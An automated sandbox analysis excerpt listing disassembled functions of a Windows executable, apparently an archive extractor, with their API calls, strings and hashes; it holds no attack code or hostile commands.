FileTimeToSystemTime.KERNEL32(?,?), ref: 0035C39C
GetTimeFormatW.KERNEL32(00000400,00000002,?,00000000,?,00000032), ref: 0035C3B8
GetDateFormatW.KERNEL32(00000400,00000000,?,00000000,?,00000032), ref: 0035C3D4
_swprintf.LIBCMT ref: 0035C404

Part of subcall function 00344092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 003440A5

SetDlgItemTextW.USER32(?,0000006A,?), ref: 0035C417
FindClose.KERNEL32(00000000), ref: 0035C41E
_swprintf.LIBCMT ref: 0035C477
SetDlgItemTextW.USER32(?,00000068,?), ref: 0035C48A
SendDlgItemMessageW.USER32(?,00000067,00000170,?,00000000), ref: 0035C4A7
FileTimeToLocalFileTime.KERNEL32(?,?,?), ref: 0035C4C7
FileTimeToSystemTime.KERNEL32(?,?), ref: 0035C4D7
GetTimeFormatW.KERNEL32(00000400,00000002,?,00000000,?,00000032), ref: 0035C4F1
GetDateFormatW.KERNEL32(00000400,00000000,?,00000000,?,00000032), ref: 0035C509
_swprintf.LIBCMT ref: 0035C535
SetDlgItemTextW.USER32(?,0000006B,?), ref: 0035C548
_swprintf.LIBCMT ref: 0035C59C
SetDlgItemTextW.USER32(?,00000069,?), ref: 0035C5AF

Part of subcall function 0035AF0F: GetLocaleInfoW.KERNEL32(00000400,0000000F,?,00000064), ref: 0035AF35
Part of subcall function 0035AF0F: GetNumberFormatW.KERNEL32(00000400,00000000,?,0037E72C,?,?), ref: 0035AF84

Strings

%s %s, xrefs: 0035C469, 0035C58E
REPLACEFILEDLG, xrefs: 0035C247
P5, xrefs: 0035C342
%s %s %s, xrefs: 0035C3F2, 0035C527

Memory Dump Source

Source File: 00000000.00000002.1653871028.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true

Associated: 00000000.00000002.1653850160.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653947444.0000000000373000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.000000000037E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.0000000000385000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.00000000003A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1654119576.00000000003A3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_340000_0V2JsCrGUB.jbxd

Similarity

API ID: ItemTime$File$Text$Format$_swprintf$MessageSend$DateFindLocalSystem$CloseDialogFirstFocusInfoLocaleNumberWindow__vswprintf_c_l
String ID: %s %s$%s %s %s$P5$REPLACEFILEDLG
API String ID: 797121971-2739185553
Opcode ID: 8f7689e0e7105ae06932678b54fc62e7e8121ceabdd15ee993b6f31e1106b23f
Instruction ID: 6a336a2d5d195acf71046e43a36e56b88a3b8555e274d31eeb862e66cad51cca
Opcode Fuzzy Hash: 8f7689e0e7105ae06932678b54fc62e7e8121ceabdd15ee993b6f31e1106b23f
Instruction Fuzzy Hash: E7919472148348BFD632DBA0CC49FFB77ACEB4A705F404819FA49D6091D775A6088B62

Function 00346FAA Relevance: 28.3, APIs: 12, Strings: 4, Instructions: 328fileCOMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00346FAA
_wcslen.LIBCMT ref: 00347013
_wcslen.LIBCMT ref: 00347084

Part of subcall function 00347A9C: GetCurrentProcess.KERNEL32(00000020,?), ref: 00347AAB
Part of subcall function 00347A9C: GetLastError.KERNEL32 ref: 00347AF1
Part of subcall function 00347A9C: CloseHandle.KERNEL32(?), ref: 00347B00

Part of subcall function 0034A1E0: DeleteFileW.KERNELBASE(000000FF,?,?,0034977F,?,?,003495CF,?,?,?,?,?,00372641,000000FF), ref: 0034A1F1
Part of subcall function 0034A1E0: DeleteFileW.KERNEL32(?,000000FF,?,00000800,?,?,0034977F,?,?,003495CF,?,?,?,?,?,00372641), ref: 0034A21F

CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000001,00000080,00000000,?,?,00000001,?), ref: 00347139
CloseHandle.KERNEL32(00000000), ref: 00347155
CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000003,02200000,00000000), ref: 00347298

Part of subcall function 00349DA2: FlushFileBuffers.KERNEL32(?,?,?,?,?,?,003473BC,?,?,?,00000000), ref: 00349DBC
Part of subcall function 00349DA2: SetFileTime.KERNELBASE(?,?,?,?), ref: 00349E70

Part of subcall function 00349620: CloseHandle.KERNELBASE(000000FF,?,?,003495D6,?,?,?,?,?,00372641,000000FF), ref: 0034963B

Part of subcall function 0034A4ED: SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,0034A325,?,?,?,0034A175,?,00000001,00000000,?,?), ref: 0034A501
Part of subcall function 0034A4ED: SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,0034A325,?,?,?,0034A175,?,00000001,00000000,?,?), ref: 0034A532

Strings

SeCreateSymbolicLinkPrivilege, xrefs: 00346FCC
UNC\, xrefs: 00347051
\??\, xrefs: 0034702B
SeRestorePrivilege, xrefs: 00346FC2

Memory Dump Source

Source File: 00000000.00000002.1653871028.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true

Associated: 00000000.00000002.1653850160.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653947444.0000000000373000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.000000000037E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.0000000000385000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.00000000003A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1654119576.00000000003A3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_340000_0V2JsCrGUB.jbxd

Similarity

API ID: File$CloseHandle$AttributesCreateDelete_wcslen$BuffersCurrentErrorFlushH_prologLastProcessTime
String ID: SeCreateSymbolicLinkPrivilege$SeRestorePrivilege$UNC\$\??\
API String ID: 3983180755-3508440684
Opcode ID: 2c28f0fc0e35a54eb32d65cc44eb718c0cb9d5564e28357565507dea3ebce9c0
Instruction ID: 3a90d4b54441a4cbc946107eb07ad65350f7f6834c710c6faa65dc74a5f3554c
Opcode Fuzzy Hash: 2c28f0fc0e35a54eb32d65cc44eb718c0cb9d5564e28357565507dea3ebce9c0
Instruction Fuzzy Hash: A2C19275904644AADB27DF74CC42BEEB7ECAF04300F00455AF95AEB282D774BA449BA1

Function 0036D8EE Relevance: 10.1, APIs: 1, Strings: 4, Instructions: 1381COMMONLIBRARYCODE

Download Yara Rule

APIs

__floor_pentium4.LIBCMT ref: 0036DA34

Strings

1#IND, xrefs: 0036EC2C
1#SNAN, xrefs: 0036EC33
1#INF, xrefs: 0036EC41
1#QNAN, xrefs: 0036EC3A

Memory Dump Source

Source File: 00000000.00000002.1653871028.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true

Associated: 00000000.00000002.1653850160.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653947444.0000000000373000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.000000000037E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.0000000000385000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.00000000003A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1654119576.00000000003A3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_340000_0V2JsCrGUB.jbxd

Similarity

API ID: __floor_pentium4
String ID: 1#IND$1#INF$1#QNAN$1#SNAN
API String ID: 4168288129-2761157908
Opcode ID: 074cc00e7464ff33374ef57b2e4e7860a4d260259a8dd73accd415bb815546e2
Instruction ID: ce2fe985700afd53d534afb1fac58096472cf171aeda307fac9eb4e357e28b7e
Opcode Fuzzy Hash: 074cc00e7464ff33374ef57b2e4e7860a4d260259a8dd73accd415bb815546e2
Instruction Fuzzy Hash: A3C26D75E086288FDB26CF28DD447EAB7B9EB44305F1581EAD40EE7244E774AE858F40

Function 003432F7 Relevance: 9.4, APIs: 2, Strings: 3, Instructions: 608COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00343300
_swprintf.LIBCMT ref: 003436C7

Strings

h%u, xrefs: 003436BC
CMT, xrefs: 00343A17
hc%u, xrefs: 0034370A

Memory Dump Source

Source File: 00000000.00000002.1653871028.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true

Associated: 00000000.00000002.1653850160.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653947444.0000000000373000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.000000000037E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.0000000000385000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.00000000003A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1654119576.00000000003A3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_340000_0V2JsCrGUB.jbxd

Similarity

API ID: H_prolog_swprintf
String ID: CMT$h%u$hc%u
API String ID: 146138363-3282847064
Opcode ID: eecfbfcdf57682a49f2a7d0654116ace959e6c3653df60b4cd0c5498be2e067d
Instruction ID: a2a783e38559d8bab64a2b09bd58e828c3699fe6386a249f102a50538683fa9f
Opcode Fuzzy Hash: eecfbfcdf57682a49f2a7d0654116ace959e6c3653df60b4cd0c5498be2e067d
Instruction Fuzzy Hash: 0532C3715152849BDB1ADF74C896AEA3BE5EF15300F04447DFD8A8F286DB70BA49CB20

Function 0034286B Relevance: 7.8, APIs: 3, Strings: 1, Instructions: 798COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00342874
_strlen.LIBCMT ref: 00342E3F

Part of subcall function 003502BA: __EH_prolog.LIBCMT ref: 003502BF

Part of subcall function 00351B84: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,?,?,?,?,0034BAE9,00000000,?,?,?,00010466), ref: 00351BA0

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00342F91

Strings

CMT, xrefs: 00342FBC

Memory Dump Source

Source File: 00000000.00000002.1653871028.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true

Associated: 00000000.00000002.1653850160.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653947444.0000000000373000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.000000000037E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.0000000000385000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.00000000003A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1654119576.00000000003A3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_340000_0V2JsCrGUB.jbxd

Similarity

API ID: H_prolog$ByteCharMultiUnothrow_t@std@@@Wide__ehfuncinfo$??2@_strlen
String ID: CMT
API String ID: 1206968400-2756464174
Opcode ID: d92f16f04b142ba1514068622ea3e429d0d8a7e593c8abdaecc00120a3e34dfb
Instruction ID: dcc04d7e3a77501d1f72a074064bc8b37d1ff953ce925ba7c9043485cd7abddf
Opcode Fuzzy Hash: d92f16f04b142ba1514068622ea3e429d0d8a7e593c8abdaecc00120a3e34dfb
Instruction Fuzzy Hash: 7F62F4716002448FDB1ADF34C886AEA7BE1EF55300F09457EFC9A9F282DB75A945CB60

Function 0035F838 Relevance: 6.1, APIs: 4, Instructions: 73COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32(00000017), ref: 0035F844
IsDebuggerPresent.KERNEL32 ref: 0035F910
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0035F930
UnhandledExceptionFilter.KERNEL32(?), ref: 0035F93A

Memory Dump Source

Source File: 00000000.00000002.1653871028.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true

Associated: 00000000.00000002.1653850160.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653947444.0000000000373000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.000000000037E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.0000000000385000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.00000000003A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1654119576.00000000003A3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_340000_0V2JsCrGUB.jbxd

Similarity

API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
String ID:
API String ID: 254469556-0
Opcode ID: 6ee2a5daaed7b0786d3f836fa6036e2e5183e3a3f557d056dddff415d056051f
Instruction ID: b689cdec13b1bf8a2debf53b3dbba8eb29ef73fce4ef9a02ecff17c8f2b0267c
Opcode Fuzzy Hash: 6ee2a5daaed7b0786d3f836fa6036e2e5183e3a3f557d056dddff415d056051f
Instruction Fuzzy Hash: 66312B75D052199FDB21EFA4D989BCCBBF8AF04305F1040AAE40CAB250EB719B889F45

Function 0035E6A3 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 49COMMONLIBRARYCODE

Download Yara Rule

APIs

VirtualQuery.KERNEL32(80000000,0035E5E8,0000001C,0035E7DD,00000000,?,?,?,?,?,?,?,0035E5E8,00000004,003A1CEC,0035E86D), ref: 0035E6B4
GetSystemInfo.KERNEL32(?,?,00000000,?,?,?,?,0035E5E8,00000004,003A1CEC,0035E86D), ref: 0035E6CF

Strings

D, xrefs: 0035E6C3

Memory Dump Source

Source File: 00000000.00000002.1653871028.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true

Associated: 00000000.00000002.1653850160.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653947444.0000000000373000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.000000000037E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.0000000000385000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.00000000003A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1654119576.00000000003A3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_340000_0V2JsCrGUB.jbxd

Similarity

API ID: InfoQuerySystemVirtual
String ID: D
API String ID: 401686933-2746444292
Opcode ID: 274898614047b6f8b9b919dbcff6f8ffbc9127eba4066228b9b27813166c1b34
Instruction ID: 75b96ba90911d7697d7afe5bc8c3adb7fd4b2cae6ff820af65806d074f4b6cc1
Opcode Fuzzy Hash: 274898614047b6f8b9b919dbcff6f8ffbc9127eba4066228b9b27813166c1b34
Instruction Fuzzy Hash: B901F7326001096BDB28DE29DC09FDD7BAAAFC4325F0DC124ED19D7150E634DA458A80

Function 00368EBD Relevance: 4.6, APIs: 3, Instructions: 78COMMONLIBRARYCODE

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 00368FB5
SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 00368FBF
UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,00000000), ref: 00368FCC

Memory Dump Source

Source File: 00000000.00000002.1653871028.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true

Associated: 00000000.00000002.1653850160.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653947444.0000000000373000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.000000000037E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.0000000000385000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.00000000003A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1654119576.00000000003A3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_340000_0V2JsCrGUB.jbxd

Similarity

API ID: ExceptionFilterUnhandled$DebuggerPresent
String ID:
API String ID: 3906539128-0
Opcode ID: 58fc8dd7db8709fd591b7ac75162832191139a71805780a542304a1bb6a061ea
Instruction ID: 63eac8a53ac050c2f6eb0a1caf382db0370d165b777a8ce58c86e4e284bf7c77
Opcode Fuzzy Hash: 58fc8dd7db8709fd591b7ac75162832191139a71805780a542304a1bb6a061ea
Instruction Fuzzy Hash: D531BC7590121DABCB22DF64DC89B9DB7B8BF08311F5041EAE81CA7250EB709F858F55

Function 0036D440 Relevance: 3.5, APIs: 2, Instructions: 464COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1653871028.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true

Associated: 00000000.00000002.1653850160.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653947444.0000000000373000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.000000000037E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.0000000000385000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.00000000003A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1654119576.00000000003A3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_340000_0V2JsCrGUB.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: aeb1b63111f38c8b5239956e5f87fb8bcb0c35bf5c950da3c1a86b78fccd596c
Instruction ID: 4e154dd36886dd01adca017d9b98a1405d65a865b2521657673b78dff114ec27
Opcode Fuzzy Hash: aeb1b63111f38c8b5239956e5f87fb8bcb0c35bf5c950da3c1a86b78fccd596c
Instruction Fuzzy Hash: 0E020B71E002199BDF15CFA9C9806AEF7F5EF88314F258169D919EB284D731AE418B90

Function 0035AF0F Relevance: 3.0, APIs: 2, Instructions: 45COMMON

Download Yara Rule

APIs

GetLocaleInfoW.KERNEL32(00000400,0000000F,?,00000064), ref: 0035AF35
GetNumberFormatW.KERNEL32(00000400,00000000,?,0037E72C,?,?), ref: 0035AF84

Memory Dump Source

Source File: 00000000.00000002.1653871028.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true

Associated: 00000000.00000002.1653850160.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653947444.0000000000373000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.000000000037E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.0000000000385000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.00000000003A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1654119576.00000000003A3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_340000_0V2JsCrGUB.jbxd

Similarity

API ID: FormatInfoLocaleNumber
String ID:
API String ID: 2169056816-0
Opcode ID: 09c6060dd29918a4750d680b0e49c0b013da4f875c15872023ad456c700c3543
Instruction ID: ae9f7875368dbe116dfcc03363b177937d5d5628acd7ec9f26d660ed5bdd702d
Opcode Fuzzy Hash: 09c6060dd29918a4750d680b0e49c0b013da4f875c15872023ad456c700c3543
Instruction Fuzzy Hash: 0101717A140349AED7229F65EC45F9A77BCEF0C711F408022FA09D7160D3709954CBA5

Function 00346C74 Relevance: 3.0, APIs: 2, Instructions: 16windowCOMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(00346DDF,00000000,00000400), ref: 00346C74
FormatMessageW.KERNEL32(00001200,00000000,00000000,00000400,?,?,00000000), ref: 00346C95

Memory Dump Source

Source File: 00000000.00000002.1653871028.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true

Associated: 00000000.00000002.1653850160.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653947444.0000000000373000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.000000000037E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.0000000000385000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.00000000003A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1654119576.00000000003A3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_340000_0V2JsCrGUB.jbxd

Similarity

API ID: ErrorFormatLastMessage
String ID:
API String ID: 3479602957-0
Opcode ID: fd9bae236c7ec724566760dc69fecf3b0115f89a1ecee385c05aa524115156ab
Instruction ID: 1b66b63be3383098999415f997920c959722e731f0991d4d7e29042797bf79e0
Opcode Fuzzy Hash: fd9bae236c7ec724566760dc69fecf3b0115f89a1ecee385c05aa524115156ab
Instruction Fuzzy Hash: 58D0C731344300BFFA120F614D47F5A7B9DFF45B51F14C4047755D84E0C6749854B616

Function 003719F4 Relevance: 1.8, APIs: 1, Instructions: 269COMMONLIBRARYCODE

Download Yara Rule

APIs

RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,003719EF,?,?,00000008,?,?,0037168F,00000000), ref: 00371C21

Memory Dump Source

Source File: 00000000.00000002.1653871028.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true

Associated: 00000000.00000002.1653850160.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653947444.0000000000373000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.000000000037E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.0000000000385000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.00000000003A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1654119576.00000000003A3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_340000_0V2JsCrGUB.jbxd

Similarity

API ID: ExceptionRaise
String ID:
API String ID: 3997070919-0
Opcode ID: 6340f22a6fa87649c049ad3e4b7389be8d3bf9f525230f8ec2abd96af12d3d9b
Instruction ID: 62604f7ae9bc93e8001c3f047f4e73c462723a4da63019ee599fa43793b4f3ac
Opcode Fuzzy Hash: 6340f22a6fa87649c049ad3e4b7389be8d3bf9f525230f8ec2abd96af12d3d9b
Instruction Fuzzy Hash: 33B10A366106099FD726CF2CC48AB657BE0FF45364F26C658E89ACF2A1C339D991CB40

Function 0035F654 Relevance: 1.6, APIs: 1, Instructions: 147COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 0035F66A

Memory Dump Source

Source File: 00000000.00000002.1653871028.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true

Associated: 00000000.00000002.1653850160.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653947444.0000000000373000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.000000000037E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.0000000000385000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.00000000003A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1654119576.00000000003A3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_340000_0V2JsCrGUB.jbxd

Similarity

API ID: FeaturePresentProcessor
String ID:
API String ID: 2325560087-0
Opcode ID: 40d426e1adfa727c5cc9d48258c4c031aa3356d3552bc8ca04e7e0e8036cffc6
Instruction ID: 7dfb36fa5814f9e7ea5b101353961f32d2416fbb045a5aab23fe98ca74585c14
Opcode Fuzzy Hash: 40d426e1adfa727c5cc9d48258c4c031aa3356d3552bc8ca04e7e0e8036cffc6
Instruction Fuzzy Hash: 225180719006058FDB2ACF68D881BAEBBF8FB48355F258579D805EB260D375E944CB50

Function 0034B146 Relevance: 1.5, APIs: 1, Instructions: 28COMMON

Download Yara Rule

APIs

GetVersionExW.KERNEL32(?), ref: 0034B16B

Memory Dump Source

Source File: 00000000.00000002.1653871028.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true

Associated: 00000000.00000002.1653850160.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653947444.0000000000373000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.000000000037E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.0000000000385000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.00000000003A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1654119576.00000000003A3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_340000_0V2JsCrGUB.jbxd

Similarity

API ID: Version
String ID:
API String ID: 1889659487-0
Opcode ID: 3082b2618a3877c0437b9aa3565a28aa3eeb03a7b3eb4c1aac69caa9187de56a
Instruction ID: b62ec2b3cbb8e32bc7b134a535885cc52aa1b8b78dec424ef7bb3cd51daa3181
Opcode Fuzzy Hash: 3082b2618a3877c0437b9aa3565a28aa3eeb03a7b3eb4c1aac69caa9187de56a
Instruction Fuzzy Hash: D8F01DB4D002088FDB2ACB18EC916D573FDF748315F2042D5D51993390C3B0A9C59F61

Function 003440FE Relevance: 1.5, Strings: 1, Instructions: 276COMMON

Download Yara Rule

Strings

gj, xrefs: 003441BC

Memory Dump Source

Source File: 00000000.00000002.1653871028.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true

Associated: 00000000.00000002.1653850160.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653947444.0000000000373000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.000000000037E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.0000000000385000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.00000000003A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1654119576.00000000003A3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_340000_0V2JsCrGUB.jbxd

Similarity

API ID:
String ID: gj
API String ID: 0-4203073231
Opcode ID: 471adae2721db35156ff1e42367489a9e471308f6820848d36f2aaa89532b251
Instruction ID: bbc94b0c49abbb4eb651c3aaf8f4231120552bcdbb4de3b4390e5c4d68b470a0
Opcode Fuzzy Hash: 471adae2721db35156ff1e42367489a9e471308f6820848d36f2aaa89532b251
Instruction Fuzzy Hash: 18C147B2A183818FC354CF29D88065AFBE1BFC8308F19892DE998D7311D734E945DB96

Function 0035F9D5 Relevance: 1.5, APIs: 1, Instructions: 3COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(Function_0001F9F0,0035F3A5), ref: 0035F9DA

Memory Dump Source

Source File: 00000000.00000002.1653871028.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true

Associated: 00000000.00000002.1653850160.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653947444.0000000000373000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.000000000037E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.0000000000385000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.00000000003A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1654119576.00000000003A3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_340000_0V2JsCrGUB.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: 3c9c9047f451baad01bc1bea88d466b92c2500cc46e8c25b39046743be292c3e
Instruction ID: 4bfc95a9aadce295df298877e532b6a67ddcb5d464c43291cb8452e66dbd2227
Opcode Fuzzy Hash: 3c9c9047f451baad01bc1bea88d466b92c2500cc46e8c25b39046743be292c3e
